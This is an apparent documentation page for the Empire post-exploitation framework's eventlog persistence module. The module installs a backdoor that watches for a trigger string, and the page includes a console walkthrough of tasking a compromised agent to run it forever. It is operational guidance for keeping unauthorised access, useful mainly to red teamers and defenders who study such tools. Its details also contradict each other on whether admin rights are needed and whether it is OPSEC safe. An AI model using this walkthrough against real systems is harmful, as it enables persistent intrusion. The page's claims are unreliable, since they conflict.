Invoke-EventLogBackdoor - Empire Module
This page contains detailed information about how to use the powershell/persistence/powerbreach/eventlog Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-EventLogBackdoor
Module: powershell/persistence/powerbreach/eventlog
Source code [1]: empire/server/modules/powershell/persistence/powerbreach/eventlog.yaml
Source code [2]: empire/server/modules/powershell/persistence/powerbreach/eventlog.py
MITRE ATT&CK:
T1084
Language: PowerShell
Needs admin: Yes
OPSEC safe: Yes
Background: No
The eventlog module starts the event-loop backdoor.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the eventlog module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the eventlog module:
Agent
Agent to run module on.
Listener
Listener to use.
Sleep
Time (in seconds) to sleep between checks.
Default value: 30
.
Timeout
Time (in seconds) to run the backdoor. Defaults to 0 (run forever).
Trigger
The unique value to look for in every event packet.
Default value: HACKER
.
Additional Module Options
This is a list of additional options that are supported by the eventlog module:
OutFile
Output the backdoor to a file instead of tasking to an agent.
Eventlog Example Usage
Here's an example of how to use the eventlog module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/persistence/powerbreach/eventlog
Author @sixdub
Background False
Comments http://sixdub.net
Description Starts the event-loop backdoor.
Language powershell
Name powershell/persistence/powerbreach/eventlog
NeedsAdmin True
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1084
,Record Options-----,----------,------------------------------------,
| Name | Value | Required | Description |
|----------|--------|----------|------------------------------------|
| Agent | | True | Agent to run module on. |
|----------|--------|----------|------------------------------------|
| Listener | | True | Listener to use. |
|----------|--------|----------|------------------------------------|
| OutFile | | False | Output the backdoor to a file |
| | | | instead of tasking to an agent. |
|----------|--------|----------|------------------------------------|
| Sleep | 30 | True | Time (in seconds) to sleep between |
| | | | checks. |
|----------|--------|----------|------------------------------------|
| Timeout | 0 | True | Time (in seconds) to run the |
| | | | backdoor. Defaults to 0 (run |
| | | | forever). |
|----------|--------|----------|------------------------------------|
| Trigger | HACKER | True | The unique value to look for in |
| | | | every event packet. |
'----------'--------'----------'------------------------------------'
(Empire: usemodule/powershell/persistence/powerbreach/eventlog) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/persistence/powerbreach/eventlog) > set Listener listener1
[*] Set Listener to listener1
(Empire: usemodule/powershell/persistence/powerbreach/eventlog) > set Sleep 30
[*] Set Sleep to 30
(Empire: usemodule/powershell/persistence/powerbreach/eventlog) > set Timeout 0
[*] Set Timeout to 0
(Empire: usemodule/powershell/persistence/powerbreach/eventlog) > set Trigger HACKER
[*] Set Trigger to HACKER
(Empire: usemodule/powershell/persistence/powerbreach/eventlog) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/powerbreach/eventlog.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/powerbreach/eventlog.py
- http://sixdub.net
- http://attack.mitre.org/techniques/T1084
See Also
Check also the following modules related to this module:
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.